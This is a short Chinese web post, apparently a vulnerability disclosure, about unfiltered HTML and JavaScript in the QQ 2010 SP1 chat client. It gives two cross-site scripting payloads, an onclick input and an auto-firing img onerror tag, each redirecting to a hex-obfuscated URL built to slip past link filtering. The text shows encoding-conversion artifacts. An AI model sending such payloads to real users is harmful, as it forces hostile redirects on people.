Win7之家( www.airtaxifl.com):QQ騰訊2010SP1發(fā)布即現(xiàn)嚴重漏洞
騰訊QQ一向是騰訊主打的產(chǎn)品,意想不到前天發(fā)布的QQ2010SP1竟然有如此大漏洞。
首先囧一下:腳本出錯還會提示錯誤
1、消息記錄的Javascript、Html標簽沒有屏蔽
2、消息盒子Javascript、Html標簽沒有屏蔽
3、小實驗
1、發(fā)送代碼:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
因為騰訊會自動將url轉(zhuǎn)換,我們必須混淆url才能發(fā)送
4、超牛代碼
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
因為要點擊才能觸發(fā),想到一個不用點擊就能觸發(fā)的代碼。
5、希望騰訊快點修復(fù),這個漏洞非同小可
6、本漏洞由TGL發(fā)現(xiàn)。
注意,本代碼僅供研究之用,請勿用于不當用途。
如打算規(guī)避漏洞帶來的風險,請下載SP0版本,看來SP1版本的changelog得修改為“更新了一些漏洞”。
評論列表
查看所有 條評論